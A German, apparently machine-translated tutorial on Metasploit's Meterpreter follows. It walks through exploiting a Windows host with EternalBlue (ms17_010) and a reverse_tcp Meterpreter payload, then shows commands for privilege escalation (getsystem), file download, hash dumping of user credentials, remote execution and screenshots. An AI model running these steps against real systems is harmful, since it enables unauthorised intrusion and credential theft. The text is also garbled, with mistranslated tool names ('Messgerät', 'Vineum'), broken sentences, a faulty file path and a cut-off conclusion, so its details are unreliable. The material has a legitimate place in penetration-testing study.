Einführung in Messgerät
Messgerät ist eine Angriffsnutzlast im Metasploit -Framework, mit dem der Täter durch eine Befehlsschale durch den Opfer des Opfers steuern und navigieren kann. Es kann sich als sehr vielseitiges Werkzeug bei Penetrationstests erweisen. Es handelt sich um ein Tool nach der Ausbeutung, das auf der Injektion von In-Memory-DLL basiert. Dies bedeutet, dass die injizierte DLL durch Erstellen eines neuen Vorgangs erstellt wird, bei dem das System auffordert, die injizierte DLL auszuführen. Sie können Zugriff auf eine unsichtbare Befehlsschale auf einer Opfermaschine erhalten, sodass Sie ausführbare und Profilnetzwerke ausführen können.
Es wurde ursprünglich für Metasploit 2 geschrieben.x und wird für Metasploit 3 aktualisiert.
Wir werden die Verwendungen von Messgerät im Detail diskutieren, aber davor haben wir ein Wort über Nutzlasten im Allgemeinen
Was sind Nutzlasten?
Nutzlasten in Metasploit sind Module, dh sie sind Snippets von Codes innerhalb von Metasploit, die auf dem Remote -System ausgeführt werden, das wir abzielen. Das Exploit -Modul wird zuerst gesendet, das das Nutzlastmodul auf dem System installiert. Dann gewährt die Nutzlast den Zugriff auf den Angreifer (eingeschränkt oder vollwertig, hängt vom Inhalt der Nutzlast ab). Um die Funktionsweise von Nutzlasten weiter auszuarbeiten, müssen wir seine Typen diskutieren, die insgesamt 3 sind:
Einzel
Diese Nutzlasten sind vollständig in sich geschlossen, was bedeutet, dass diese so grundlegend sein können wie Gatekeeper-Codes, die den Benutzer in ein Zielsystem ermöglichen.
Stager
Stager sind Nutzlasten, die Anwendungen innerhalb des Zielsystems sammeln und an den Angreifer senden. Es stellt die Verbindung zwischen dem Opfer zu unserer lokalen Maschine her.
Stufen
Sobald die Stager Zugriff auf das System haben, laden sie die Stufenmodule herunter. Stufenmodule entfernen die Größenkappe am Messgerät.
Beispiele für Stadien wären eine einfache Shell, iPhone 'IPWN' -Shell, Meterpreter -Module, VNC -Injektion.
Sie können die Art der Nutzlast erarbeiten, indem Sie seinen Namen ermitteln. Einzelne Nutzlasten sind normalerweise vom Format /
Ausbeutung mit Messgerät
Starten Sie zunächst die MSF -Konsole, indem Sie den folgenden Terminalbefehl im Kali -Terminalfenster eingeben.
$ sudo msfconsole
Wir verwenden Reverse_tcp als Stager und Meterpreter als Bühne.
Wir werden zunächst den ewigen blauen Exploit aufstellen. Select (ms17_010_eternalBlue) Setzen
Konfigurieren Sie als Nächstes die Exploit -Einstellungen und führen Sie den Befehl Exploit mit Exploit -Befehl aus:
$ Setzen Sie Payload Windows/X64/MeterPreter/Reverse_tcp
$ set Rhost 192.168.198.136
$ exploit
Der Eternalblue Exploit wurde erfolgreich aktiviert.
Nachausnutzung
Wir zugreifen und manipulieren Sie das bereits kompromittierte System während der Nachaussetzung.
Wir können jetzt viele Dinge tun, da wir Zugriff auf das System haben, aber wie oben erwähnt, müssen wir uns hauptsächlich auf das Herunterladen von Informationen und den Erhalt von Benutzeranmeldeinformationen konzentrieren
Verwalten des Zugriffs Privilegien:
Abhängig vom Nutzlastmodul und dem von Ihnen verwendeten Ausbeutung werden Sie möglicherweise mit bestimmten Zugriffsbeschränkungen konfrontiert, die Ihre Fähigkeiten, die Opfermaschine zu manövrieren. Sie können dieses Problem mit der Eskalation mit Privilegien umgehen, indem Sie Passwörter löschen und die Registrierung manipulieren. Sie können auch die Berechtigungen mit dem Get System -Command von Meterpreter eskalieren.
$ getSystem
$ Getuid
Dateiübertragung mit Messgerät
Mit Messgerät können Sie eine Datei mit dem Befehl $ download herunterladen.
$ Download/Windows/System32/Treiber/etc/hosts
In ähnlicher Weise können Sie Informationen auch mit $ Upload-Befehl auf den Computer hochladen
Extrahieren von Benutzeranmeldeinformationen:
Verwenden Sie Codes -Skript -Anmeldeinformationen_Collector, um Benutzerkonteninformationen zu extrahieren, oder verwenden Sie das Hash -Dump -Postmodul zu einem ähnlichen Effekt.
Wir werden das Hash -Dump -Postmodul verwenden, um mit der Ernte der Anmeldeinformationen fortzufahren. Geben Sie den folgenden MSF -Befehl ein.
$ Run Post/Windows/Gather/Hashdump
Wie wir sehen können, haben wir die Coen-, Gast- und Administratorkonten erhalten. Der LM -Hash (Administrator) und der NTLM (Gast) Hash beziehen sich auf leere Passwörter, während der Coen -Hash ein Passwort ist, das Sie zum Knacken benötigen. Sie können dies mit einem Passwortcracker verwenden.
Automatisierung des Systems
Es kann mühsam sein, Informationen mit individuellen Eingabeberechnungen zu sammeln, mit denen Sie die Befehlsschale weiter füttern müssen. Praktischerweise können Sie diesen Vorgang mit Vineum-Skript etwas automatisieren. Das Skript sammelt Informationen vom Opfer und lädt die Daten in unsere lokale Maschine herunter. Sie werden mitgeteilt, wo die Ausgabe gespeichert wird, wie Sie in der vierten Zeile von oben sehen können:
$ Run Wineum
Denken Sie daran, dass der Weg, in dem die Ausgabe jedes Befehls gespeichert ist.
Lass uns ein bisschen mehr herumspielen
Dateien ausführen
Sie können jede Datei auf dem System ausführen, indem Sie Folgendes verwenden: -f . Dies umfasst sowohl ausführbare Dateien als auch Programme mit mehreren unterstützenden Dateien. Um beispielsweise die integrierte Taschenrechner -App im Windows -Betriebssystem auszuführen.exe
Screenshots machen
Sie können auch Screenshots aus der Sicht des Benutzers erfassen. Geben Sie einfach Screenshot in die Befehlsschale des Messgeräts ein, und Sie erhalten einen Screenshot des Displays auf dem System.
$ execute -f calc.exe
$ screenshot
Abschluss:
Dies war eine kurz. Wir haben hier erfahren, wie wir ein Windows OS-System mit Eternalblue-Exploit verletzen können, um Zugriff zu erhalten, und dann mit dem Messgerät die Berechtigung zu eskalieren, Informationen manuell zu sammeln und durch den Automatisieren von Vineus-Befehl. Wir haben auch gelernt, wie man Dateien auf dem Opfergerät ausführt.
Messgerät kann als nennenswerte Mittel zur Anfälligkeitserkennung dienen, obwohl es sich.